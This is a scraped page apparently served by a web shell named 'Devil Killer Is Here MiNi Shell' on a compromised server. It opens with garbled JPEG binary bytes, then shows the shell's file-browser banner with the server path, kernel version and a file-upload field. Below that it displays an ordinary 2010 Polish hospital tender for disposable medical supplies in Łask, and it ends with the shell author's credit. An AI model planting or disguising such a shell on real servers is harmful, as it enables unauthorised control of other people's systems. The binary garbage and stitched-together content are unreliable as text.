JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/18276-N-2010.html

<p class="kh_header"><b>Łask: Dostawa sprzętu jednorazowego użycia do siedziby Zamawiającego II/2010</b><br>
<b>Numer ogłoszenia: 18276 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Warszawska 62, 98-100 Łask, woj. łódzkie, tel. 043 675 55 55, faks 0-43 676 11 99.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ipzp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego użycia do siedziby Zamawiającego II/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa sprzętu jednorazowego użycia w asortymentach, ilościach i jednostkach wyszczególnionych 
w załączniku nr 4 do SIWZ do wskazanych przez Zamawiającego Oddziałów i jednostek szpitala. 

Wspólny słownik zamówień CPV

33141000-0 Jednorazowe, niechemiczne artykuły medyczne i hematologiczne


1.	Cały  asortyment objęty przedmiotowym zamówieniem  musi być dopuszczony do obrotu na terenie RP, to jest posiadać dopuszczenia do obrotu  zgodnie z obowiązującymi przepisami odpowiednio:
- ustawą z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. z 2004 r., nr 93, poz. 896 z późn. zm.). 
- aktami wykonawczymi do wskazanej wyżej ustawy oraz innymi obowiązującymi w tym zakresie przepisami.
2.	Okres ważności asortymentu  nie może być krótszy niż 2/3 całego okresu ważności dla poszczególnych produktów. Dostawa asortymentu z terminem krótszym  niż wskazany może nastąpić wyłącznie po konsultacji z Kierownikiem Działu Administracyjno- Gospodarczego, wyłącznie w uzasadnionych przypadkach.
3.	Wykonawca będzie dostarczał asortyment zapakowany w oddzielne paczki zgodnie z treścią zamówienia na poszczególne Oddziały i inne jednostki szpitalne; będzie również wystawiał odrębne faktury.
4.	Zamówienia będą dokonywane telefonicznie bądź faxem.
5. Asortyment  będzie dostarczany na koszt i ryzyko Wykonawcy zgodnie ze złożonym zamówieniem w terminie do 5 dni od złożenia zamówienia; jednakże w przypadku dostaw interwencyjnych obowiązywać będzie termin 2 dni od złożenia zamówienia na dostarczenie asortymentu.
6.	Wybrany Wykonawca zabezpiecza dostawy, z wyjątkiem braku dostępności produktu na rynku (zakończenie produkcji, czasowy brak produkcji, wyrejestrowanie). W takim przypadku wykonawca zobowiązany jest powiadomić Zamawiającego na piśmie o tym fakcie 
z podaniem przyczyny. 
7.	Zamawiający dopuszcza składanie ofert na  poszczególne pakiety, gdzie  pakiet (zadanie, część zamówienia) stanowi:

Pakiet I. Rurki i akcesoria
Pakiet II. Wkłady do odsysania

8. Zamawiający nie dopuszcza dalszego dzielenia poszczególnych części zamówienia - pakietów przez Wykonawcę. Część zamówienia to 100% pakietu.
Oferty, które nie będą zawierały pełnego zakresu przedmiotu zamówienia określonego w wybranej części zamówienia zostaną odrzucone.
9. Zamawiający zastrzega sobie możliwość obniżenia wielkości zamówienia w zależności od zapotrzebowania oraz możliwość wyłączenia z przedmiotu zamówienia niektórych artykułów medycznych, o ile w trakcie realizacji wystąpią uzasadnione okoliczności. Wskazana zmiana powoduje odpowiednią zmianę wartości zamówienia.
10.W trakcie obowiązywania umowy strony dopuszczają zmiany cen wyłącznie w przypadkach:
- zmiany stawki podatku VAT (cena netto bez zmian),
- zmian cen urzędowych wyrobów medycznych, wprowadzonych rozporządzeniem właściwego ministra. 
Wyżej wymienione zmiany następują z mocy prawa, obowiązują od chwili ich wejścia w życie, nadto muszą być potwierdzone aneksem do umowy.
11. W przypadku zaprzestania produkcji danego wyrobu medycznego lub wygaśnięcia jego rejestracji po dacie opublikowania niniejszej SIWZ, Wykonawca przygotowujący ofertę jest zobowiązany do skierowania pytania do zamawiającego o możliwość modyfikacji pakietu. Pytanie musi zostać skierowane nie później niż do końca dnia, w którym upływa połowa wyznaczonego terminu składania. Obligatoryjną formą porozumiewania się jest forma pisemna. Zamawiający dopuszcza możliwość porozumiewania się faxem, pod warunkiem niezwłocznego potwierdzenia pisemnego drogą listowną .
12. Zamawiający nie dopuszcza składania ofert wariantowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie przedmiotowego zamówienia mogą się ubiegać Wykonawcy, którzy spełniają poniższe warunki: 
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, tj.: są uprawnieni do występowania w obrocie prawnym i prowadzą działalność w zakresie objętym niniejszym zamówieniem, Wykonawca składa oświadczenie zgodnie z załącznikiem nr 2  oraz dokumenty określone w punkcie VI.1  SIWZ.
2. posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia tj.:
a) wykonali w okresie ostatnich 3 (trzech) lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie na sprzęt jednorazowy dla ZOZ-u  o wartości minimalnej równej wartości złożonej oferty.
Wykonawca składa oświadczenie zgodnie z załącznikiem nr 2  oraz dokumenty określone w punkcie VI. 2  SIWZ
3. dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
4. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. posiadają dostęp do wolnych środków finansowych lub zdolność kredytową w wysokości co najmniej takiej, jak wartość złożonej oferty,  - Wykonawca składa oświadczenie zgodnie z załącznikiem nr 2   oraz dokumenty określone w VI.3 SIWZ
Ocena spełnienia wyżej wskazanych warunków zostanie dokonana na podstawie oświadczeń potwierdzających ich spełnienie (formuła spełnia/nie spełnia) zgodnie z załącznikiem nr 2 do SIWZ oraz dokumentów i oświadczeń wskazanych w punkcie VI niniejszej SIWZ - odpowiednio do poszczególnych warunków.
5. Z postępowania o udzielenie zamówienia wyklucza się:
1)wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona orzeczeniem sadu, które uprawomocniło się w okresie 3 lat przed wszczęciem postępowania;
1.2. wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sadu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację  majątku upadłego;
1.3. wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
1.4. osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.5. spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.6. spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.7. spółki komandytowe oraz spółki komandytowo- akcyjne, których komplemantariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.8. osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przeciwko środowisku, przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
1.9. podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
1.10. Wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 ustawy.
2. Z postępowania o udzielenie zamówienia wyklucza się również Wykonawców, którzy:
2.1. wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2;
2.2. nie wnieśli wadium do upływu terminu składania ofert, na przedłużony okres związania oferta lub w terminie, o którym mowa w art. 46 ust. 3, albo nie zgodzili się na przedłużenie okresu związania oferta;
2.3. złożyli nieprawdziwe informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania;
2.4. nie wykazali spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków określonych w punkcie V Wykonawca jest zobowiązany załączyć do oferty następujące dokumenty i oświadczenia:
1. Dokumenty i oświadczenia potwierdzające spełnienie warunku określonego w punkcie V.1.
1.1.Oświadczenie zgodnie z załącznikiem nr 2 do SIWZ*.
1.2.  aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej -  wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.3. aktualne zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.4. aktualne zaświadczenia właściwego  oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem  opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87 poz. 605):
1)	pkt 2, 3 i 5 - składa dokument lub dokumenty, wystawione w kraju, 
w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
      a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
    b)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie  społeczne i zdrowotne albo że uzy?skał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub
wstrzymanie w całości wykonania decyzji właściwego organu,
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2)	pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
Dokumenty, o których mowa w  pkt 1 lit. a i c oraz pkt 2 wyżej cytowanego Rozporządzenia, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w po?stępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopusz?czenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamiesz?kania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wyko?nawca ma siedzibę lub miejsce zamieszkania. Przepis ust. § 2 ust. 2  ww. Rozporządzenia stosuje się odpowiednio.
2. Dokumenty i oświadczenia potwierdzające spełnienie warunku określonego w punkcie V.2.
2.1. Oświadczenie zgodnie z załącznikiem nr 2 do SIWZ*.
2.2. Wykaz wykonanych w okresie ostatnich 3 (trzech) lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zamówienia na sprzęt jednorazowego użytku dla ZOZ - u o minimalnej wartości równej  wartości złożonej oferty z  podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu należy dołączyć  dokumenty potwierdzające, że dostawy te zostały wykonana należycie (referencje, listy polecające, podpisane protokoły odbioru itp.) - załącznik nr 7.
 
3. Dokumenty i oświadczenia potwierdzające spełnienie warunku określonego w punkcie V.3.
3.1.Oświadczenie zgodnie z załącznikiem nr 2 do SIWZ*.
4 . Dokumenty i oświadczenia potwierdzające spełnienie warunku określonego w punkcie V.4.
4.1.Oświadczenie zgodnie z załącznikiem nr 2 do SIWZ*.
4.2. polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
* oświadczenie zgodnie z załącznikiem nr 2 do SIWZ należy złożyć tylko jeden raz z zastrzeżeniem punktu XV SIWZ.
5. Oświadczenia i dokumenty, jakie mają obowiązek dostarczyć Wykonawcy w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego w SIWZ.
5.1. Wypełniony formularz oferty zgodnie z załącznikiem nr 1.
5.2 Wypełniony formularz - szczegółowy opis przedmiotu zamówienia - załącznik  nr 4. 
5.3. 1.6. Dokumenty dopuszczające  dany wyrób do obrotu  na terytorium RP w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. z 2004 r., nr 93, poz. 896 z późn. zm.)
 -  deklaracja zgodności z wymaganiami zasadniczymi sporządzona i podpisana  przez wytwórcę 
- certyfikat CE wydany przez jednostkę notyfikowaną, 
- wpis do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania
5.4.Parafowany wzór  umowy załącznik nr 3.
5.5. Oświadczenie wykonawcy potwierdzające, że oferowany asortyment składający się na wybrany pakiet posiada aktualne na czas trwania i realizacji zamówienia świadectwa i dopuszczenia uprawniające do stosowania- załącznik nr 6.
5.5 Oświadczenie  własne Wykonawcy na podstawie art. 44 ustawy Prawo zamówień publicznych - przykładowy tekst oświadczenia - załącznik nr 8.
6. Dokumenty, o których mowa w pkt. VI, mogą być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez osobę do tego upoważnioną. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
Zaleca się aby dokumenty załączone do oferty były uporządkowane według kolejności określonej w pkt.VI SIWZ i oznaczone kolejnymi numerami odpowiadającymi pozycji wpisu do wykazu dokumentów załączonych do oferty, pozycja nr 7 formularza ofertowego (załącznik nr 1). 
Weryfikacja spełnienia warunków określonych w punkcie V zostanie dokonana na podstawie złożonych dokumentów i oświadczeń według formuły spełnia/nie spełnia. 
7.	Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów oraz oświadczeń mających wpływ na wynik prowadzonego postępowania, zgodnie z art. 24 ust. 2 pkt. 3 ustawy, spowoduje wykluczenie go z postępowania.
8.	Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub  którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. 
9.	Oświadczenia lub dokumenty muszą potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego, na dzień składania ofert, nie później niż w dniu wyznaczonym przez Zamawiającego jako termin uzupełnienia oświadczeń lub dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ipzp.pl, www.spzozlask.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Łasku
ul. Warszawska 62 
98-100 Łask
pokój 23.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2010 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Łasku
ul. Warszawska 62 
98-100 Łask
pokój nr 15.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com